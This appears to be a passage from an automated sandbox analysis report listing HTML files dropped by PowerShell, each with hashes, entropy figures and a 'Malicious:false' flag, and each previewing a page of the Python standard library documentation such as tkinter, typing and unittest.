                                                                                                    Category:dropped
                                                                                                    Size (bytes):43670
                                                                                                    Entropy (8bit):4.873567438938664
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Lqy2sMMYs86yFoaGojasUGAyFMyFoa0mEAyFMyFoa06AyFMyFoaWSeAyFMyFwjyO:LqyWMYs86yFoavjasUGAyFMyFoa0mEAa
                                                                                                    MD5:DF1DFBF38755F0F12D7F3834DC962641
                                                                                                    SHA1:30E4E8A8A14B7C5E79716395EE7606CFFC89FD87
                                                                                                    SHA-256:1A374C6649668E231B78DABE07F7A62E6FDEF9C64217E5DDD5917B693028CDEE
                                                                                                    SHA-512:5C751D38599DC35B438651CCFA913BABD70CE1E49B7D6584AB3F40E2567613170B049DEB9ABFFCBAAF45E103C2B71F1F211336E6C929CC1270A2565C8691DC14
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.messagebox . Tkinter message prompts" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.messagebox.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/messagebox.py The tkinter.messagebox module provides a template base class as well as a variety of convenience methods for commonly used configurations. The message boxes a..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkinte
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (742), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17756
                                                                                                    Entropy (8bit):4.850702271496922
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:HvGvzHqklljbnFTMFb29ohDek6yFogiDCO9nJTMK76dqEC:POTqylnBMFC9Qek6yFogiDCI9MK764N
                                                                                                    MD5:8EF2797819E4D3C1BCDAB51BA8FD9CF2
                                                                                                    SHA1:72A6676F5DE0437E2933B8F62264DB38A92F8ACA
                                                                                                    SHA-256:00FA8915E863F673DAE874747B0EFEC5B8CB5661F270487FF068221C7ACBFE34
                                                                                                    SHA-512:D9E22FE921D881574E6E555C20CC0BA9DD59FD63F8B41CD248EE18B49A5D7605A83CC4256F29B0431AA3914FE2C7D3047D90DC7BFEFCFD02F5AA57BF20223389
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.scrolledtext . Scrolled Text Widget" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.scrolledtext.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/scrolledtext.py The tkinter.scrolledtext module provides a class of the same name which implements a basic text widget which has a vertical scroll bar configured to do the ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkint
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (977), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64260
                                                                                                    Entropy (8bit):4.869768673106328
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:tqy8MMvx+3yFdyF8yETarwBK/odK4t0YlWEZ9+x7RNyIWUqIdfivIIXZKLb/9/8a:8Dpg
                                                                                                    MD5:D4524D64D2E41265A84E9F1A804E6E66
                                                                                                    SHA1:F3F5D83504CD0A5242EC9851F92D60D44FF701C6
                                                                                                    SHA-256:52885871EE78F81BE382C5EE18F3DA2E73E117098F47808B280D739CC45463E7
                                                                                                    SHA-512:862522C5602298F83737A3A0D5AF642373B5D839E02A1A81C014359E4E978B7B6E5033F6FECC5A4921C11CBCE47EF1807E17BAED1DC030E2283B88925E685561
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.tix . Extension widgets for Tk" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.tix.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/tix.py The tkinter.tix(Tk Interface Extension) module provides an additional rich set of widgets. Although the standard Tk library has many useful widgets, they are far fro..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkinter/tix.py The
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (775), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):146149
                                                                                                    Entropy (8bit):4.870375777282373
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:trqy13QMDi14bvAAcGAdNOvPOkcIYyFwHog0IyFgfIpGyFuPPdqjBP0UF2RkogZ/:5VAV1rW1ahFg6EHGvwog
                                                                                                    MD5:57589B50E8B95BF827DB143B7A9D851D
                                                                                                    SHA1:238F6C8BC700C3E8CFD157CC502307988F206469
                                                                                                    SHA-256:3EE633EA407078E5596CC046D032900735F2529E4976E7FCC5F60A7D7D2B4968
                                                                                                    SHA-512:066A7CF79D412773F27E800FA42BF7611E1F8818A95C730A332501FEC7D0B80CD962DE0FB046DB8126900D71695EE22CEF4F715048F4A40964D84E86472A9EA8
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.ttk . Tk themed widgets" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.ttk.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/ttk.py The tkinter.ttk module provides access to the Tk themed widget set, introduced in Tk 8.5. It provides additional benefits including anti-aliased font rendering under..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkinter/ttk.py The tkinter
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (647), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):51722
                                                                                                    Entropy (8bit):5.009070664100479
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:Lqy2MGkQrznOHIO5dOyg6cOiEujvy5+xzwHmTlyP1ExsS9O3Y/xSruKC8zmcuDhz:t1Bg
                                                                                                    MD5:4C5BE106ED1C50A0AF9497EFCF89E6D3
                                                                                                    SHA1:A3DB8601448F8D9E4CCCD6375288B4730EE602E0
                                                                                                    SHA-256:15973931EF75BF5C57F006EFDEF662D85B944B72DC85CF53115568C2592F8E99
                                                                                                    SHA-512:3CF8C0E98CCB95D0FB7C018327063EE8FE11D4FAEB5CBB3F2B31D9EA9A910460FE8237004772AE6C8CBCDC1DF49264F00423DBB7EAB3667C2E3627EFEE3D1B8A
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="token . Constants used with Python parse trees" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/token.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/token.py This module provides constants which represent the numeric values of leaf nodes of the parse tree (terminal tokens). Refer to the file Grammar/Tokens in the Python distrib..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/token.py This mod
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (476), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):44415
                                                                                                    Entropy (8bit):4.930702398298753
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:RiqyvpyyUMPHRdGCRSumKtELJuZBCSJL00yu4VLVc6sCrzoNGf7zPbWFPOwp1yii:sqywMPHiCRSumKt8JuZBCSJXyuuLVc6v
                                                                                                    MD5:F8F0454E5F0353228700F620FE9A1816
                                                                                                    SHA1:836485175BDDAEA4765CF8DE635B37D4B44E0C30
                                                                                                    SHA-256:BC369B3476E49FDA5EF4E3BC960EECCB6E9E3328BF742B16D946CA65AB4A8088
                                                                                                    SHA-512:0EAD63C9CDD590468BEE3D9DD55F79F647B27CD15ED5435FE349A42E6344050B967646F42A20F757855D97D0690F6F2265F945C98A0F6F3F94CE0FEC583A1611
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tokenize . Tokenizer for Python source" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tokenize.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tokenize.py The tokenize module provides a lexical scanner for Python source code, implemented in Python. The scanner in this module returns comments as tokens as well, making it u..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tokenize.py The tokeni
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (733), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25108
                                                                                                    Entropy (8bit):4.895810182979896
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:rm1qyEvobd1MsIS7C/wlylaf+X/wlyld3fbLv19dBMsR764N:rm1qyEAh1MsIS7C/wlyl0+X/wlyld3f9
                                                                                                    MD5:8C68839876B1808D5202882B513FA554
                                                                                                    SHA1:4AA7865E6ED7617208D1FA5859035FD1D693B9FD
                                                                                                    SHA-256:4B13E621328B2FBE7D9C5D8B9219A5312AF2F532908A3809DD7C5C20E27BBB3A
                                                                                                    SHA-512:B2AA77E21BA9AB0A4AB85D9FC485FC94940912C2FA60F8CD8E1AD26FFB9725C14847C0CC3DB3BA6A56EAEF6FE853A4511DBAB184068CAD06BEC71045B78AC9F0
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tomllib . Parse TOML files" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tomllib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tomllib This module provides an interface for parsing TOML (Tom.s Obvious Minimal Language, https://toml.io). This module does not support writing TOML. This module defines the fol..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tomllib This module provides an i
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2139), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):42762
                                                                                                    Entropy (8bit):4.7857211747493835
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:xXqyjNaROM1NeKU/3id6Dfk5WdU0Rgnfw0ci4E87cyznIbypyQCyQhyL6yLEykpD:5qyDM18KU/3id6Dfk5WdU0Rgnfw0ci4q
                                                                                                    MD5:06FC989FBE9E8D74931D9C542202C100
                                                                                                    SHA1:FEA6A2FEE98F8E12BC19B6F38DBF2CF829325752
                                                                                                    SHA-256:DA4C7684AA335491A37892CFB05D56C1D7848683E8D7882A90CCAAD17B45A50B
                                                                                                    SHA-512:4B3E8452717B8F34931F8F911C117A67467740DB3B447F5DBFF0172972E58939B061B2A4948AAC69F1301985BD5F651B430E8E654719AAFA7A27A3B7DFCCEE6C
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="trace . Trace or track Python statement execution" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/trace.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/trace.py The trace module allows you to trace program execution, generate annotated statement coverage listings, print caller/callee relationships and list functions executed durin..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/trace.py The t
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1952), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):93888
                                                                                                    Entropy (8bit):4.856392860925196
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:xqyVM6wlKkyFlyFEu7qgajhegL4f5xyFlyFiyTVTxyFlyFiyT7P4yFkyFlyFJzKj:1u/xG/lxg
                                                                                                    MD5:28B3F1A6E9CD5C5B5E5F30581DAE6C5E
                                                                                                    SHA1:42B06F756CFE836AB0E7725F7C709AD418345D57
                                                                                                    SHA-256:80A37AD63832764F1DD54E23570B8ABAC552B9F9C875AAE754EDA5CDDE32C9F4
                                                                                                    SHA-512:1A3794AA0CA50B84732F40D4058A3784A399F94B686C1E96EC629384BEBB538380744712B46F9936BA1595D7F5F6B75D4CA87EF9AA6C8A445BCE0ADADDAFA673
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="traceback . Print or retrieve a stack traceback" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/traceback.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/traceback.py This module provides a standard interface to extract, format and print stack traces of Python programs. It exactly mimics the behavior of the Python interpreter when i..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/traceback.py
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (934), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128600
                                                                                                    Entropy (8bit):4.742118416357592
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:xcsBqPqcjMyPcsZqRF+TwZr7cYdMPKvgZSZ9ZWryBvdTROZ1LOcRcOZayJZyg:Bg
                                                                                                    MD5:60B4382FBF0F3F6A53DDAE8DFDFDB3FE
                                                                                                    SHA1:54076E719F774FE66BE931F5650F9945BC07223C
                                                                                                    SHA-256:1EE89EF0ECD46E9B79BC5089B0A4A08C3CF4DDA186B6E301E606498AC6C3420C
                                                                                                    SHA-512:42D8913C32CC081A6737FD11473009BF755F99578F0CBBFC359F447CEA31F4BC03C7D0A8CE792DB3C6C55587DEB2A9373B6C62731C718995E9C91B10794CA8CD
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tracemalloc . Trace memory allocations" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tracemalloc.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tracemalloc.py The tracemalloc module is a debug tool to trace memory blocks allocated by Python. It provides the following information: Traceback where an object was allocated, St..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tracemalloc.py The
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (583), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22489
                                                                                                    Entropy (8bit):4.876074173328206
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:mjKHqkl64xnGTMmb2M/SadbU/caATJ29mbyfNN0QfXmbyfMN07qQeg9PnUTMK76g:lqy6csMmSM/SadU/caj9mbyfNN0WXmbd
                                                                                                    MD5:AA2C1FAF34E4588D3D5E6B2E723C6178
                                                                                                    SHA1:23CAFC86D5E10E0DF494CD3D446CF5941A41AB0C
                                                                                                    SHA-256:091BE6E585A20E34E96A02E2A909D325A6CE76F1BB0D6145C2E42C033E32812D
                                                                                                    SHA-512:5E947FE08CFB89932642E9776A804EF4D4BB37FA217704FE0E2C8E26D21DBA3E756D1DB07106D79D5D0A34F6F7CCA54C82D80E948DC18C7863F1E9E56A190D2A
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tty . Terminal control functions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tty.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tty.py The tty module defines functions for putting the tty into cbreak and raw modes. Availability: Unix. Because it requires the termios module, it will work only on Unix. The tt..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tty.py The tty module defines fun
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (570), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):309410
                                                                                                    Entropy (8bit):4.774426556408551
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:A0UqaxmxIn9uktmT+psiA0ksGiNn5p5v0dKQTTEaMkPfjG61pe67u2Tjr7hkjJ+S:ALmxIn8irpmTAO6I7bgkpmlqewg
                                                                                                    MD5:3E45603ECE227F3567FDF5BAE0BB60B8
                                                                                                    SHA1:DC5AEB7DC10582B9B58F505E5D889A29D7213DD8
                                                                                                    SHA-256:37B5DACD0CDEF0D7A4130613A577BD4D3E5A801652E683DF91239C1681321BDA
                                                                                                    SHA-512:663B7B1194E7344565AFC2A9CD226CF72908438BDFF8D1870EEB025817FCE78D4800187C6743CC1CE8F887B59C73AE87798F223CED00EB82998147D54007F592
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="turtle . Turtle graphics" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/turtle.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/turtle.py Introduction: Turtle graphics is an implementation of the popular geometric drawing tools introduced in Logo, developed by Wally Feurzeig, Seymour Papert and Cynthia Solo..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/turtle.py Introduction: Turtle graphic
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1012), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77853
                                                                                                    Entropy (8bit):4.819163706261204
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:+qybMOAmblyk8yFNyFvTblyk8yFfOAkkK/ZBc7hcnaUAaMddv3mGnqj1HDm6ykI2:YcjfRcMbL9UUYvSYySMzfg
                                                                                                    MD5:9C0681A44C6F2AA1A61B89EFA5B27F82
                                                                                                    SHA1:0086E9F270D01357B65704F699FEFAABD2745F11
                                                                                                    SHA-256:BE1819DE5A45F498FE5EA6CAAECAACBB40B32AF6A6923767C8028EF0D7197631
                                                                                                    SHA-512:07BAD0B0CABA1E448B161DF2F3B4B8534EA8377F649B11D1C7E77E0D3395077CA6488B97C803BB502C9BF4CA034EC6C62D65440120012CC9E6FDE1DFE64934C4
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="types . Dynamic type creation and names for built-in types" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/types.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/types.py This module defines utility functions to assist in dynamic creation of new types. It also defines names for some object types that are used by the standard Python interpre..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/types
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (646), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):460664
                                                                                                    Entropy (8bit):4.746811850979056
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:l1vkrCepqfDrJlFLrfuvyp2tslteLouHP/2dcX77SjmI+iUdCALvaF4L4pxrQ6JZ:l1v+Ce+hnPsenUzg
                                                                                                    MD5:E28EA6F5686D90D7007E3B9687F59BB9
                                                                                                    SHA1:0213E000257967D89BCFB1027FC4FBAFC681FF07
                                                                                                    SHA-256:7BB4E9FA31FF965ECBB763E3DBDA1A7E97E350CA555C80CD8C66658EF09EF9BB
                                                                                                    SHA-512:244CFB6ACB1FB08A840466EE01D4579417E0908F68E77B7461C5C9FC89EE8C81D70E01C542B1260B818CC2F059F30F356D0DC43C143F224445DEBD7ADA87E247
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="typing . Support for type hints" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/typing.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/typing.py This module provides runtime support for type hints. Consider the function below: The function moon_weight takes an argument expected to be an instance of float, as indic..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/typing.py This module provides
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (535), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):31275
                                                                                                    Entropy (8bit):4.9358316957002435
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:YqyfoLM01bQPc5/IM5/oC5/ig5/D75o85cR5Fm5TN5Hc5C8+aL4ALUX+aBSUfGSi:YqyoM01bQPc5/IM5/oC5/ig5/D75o85S
                                                                                                    MD5:09E66D83039A5DDCFF731D460F1AA372
                                                                                                    SHA1:E72FFBDE81235E28D28231E1DD78C66C579A1F55
                                                                                                    SHA-256:3B03E282ADAF4FFA781EEB0E4A7503E6C71930E38CE2B665CA830751E6EC116C
                                                                                                    SHA-512:97CE9FAE8310BCB97E6EAE58A40FB9EC9CA17B9D52465296B9E3EE8B9B05E082082CE724DE76A2B917911FB9487E75AD3936BC393B306440984FA845D57F58B4
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="unicodedata . Unicode Database" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/unicodedata.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module provides access to the Unicode Character Database (UCD) which defines character properties for all Unicode characters. The data contained in this database is compiled from the UCD versi..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module provides access to the Unicode C
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (547), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):327775
                                                                                                    Entropy (8bit):4.75543329628818
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:8te34l4Xd4Vl7IMT0QgwYloT0AIwY1g7c347dq/UeUkCJg:8fG4v7IMIQUAOg7c347d13Jg
                                                                                                    MD5:8D933C24BE5D7CC0B45B6699E6D293DA
                                                                                                    SHA1:B5F11B487C4095F182E5BE4AF14E28A2D8DE4889
                                                                                                    SHA-256:2FCC54480BF791D1CDAFCC9D8C3FA67265F73B76F68706B9245DA8C9DB83AA19
                                                                                                    SHA-512:47CEB469FE1FB766BDD31EF7E4D36E7FA4796E5674FC5E62992490B725F7FB090E4C493C81016373CAB8412FFEB956F69AB50EBBB40812617275FCC25C578FA6
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="unittest . Unit testing framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/unittest.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/unittest/__init__.py(If you are already familiar with the basic concepts of testing, you might want to skip to the list of assert methods.) The unittest unit testing framework was ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/unittest/__init__.py(If you
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (651), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):191492
                                                                                                    Entropy (8bit):4.740754132731753
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:BtpIPzyFr2tpdaZiBsftdiFoPzmbaV6r1E0ErTHtpaWPEaZPg:u8g
                                                                                                    MD5:6C55A696F66C368F44102C061429D1A8
                                                                                                    SHA1:337BD36663B4B94FE35F177C59BFE0CB4C8FA292
                                                                                                    SHA-256:26D86169A8E856C886D9F2D223EA2D3EA3D1DC135F6BEF3A1972497C71536BDC
                                                                                                    SHA-512:6784B728FF7BDDB3806DC16A929BF2779EB533E316C4895811EFD983097DB2FF96E92C6DD977F22DF82F35FEDF11F37EF7F5FACEB79ED8C07BF836E2455A0948
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="unittest.mock . getting started" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/unittest.mock-examples.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Using Mock: Mock Patching Methods: Common uses for Mock objects include: Patching methods, Recording method calls on objects. You might want to replace a method on an object to check that it is cal..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Using Mock: Mock Patching Method
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1904), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):398397
                                                                                                    Entropy (8bit):4.764643435833687
                                                                                                    Encrypted:false
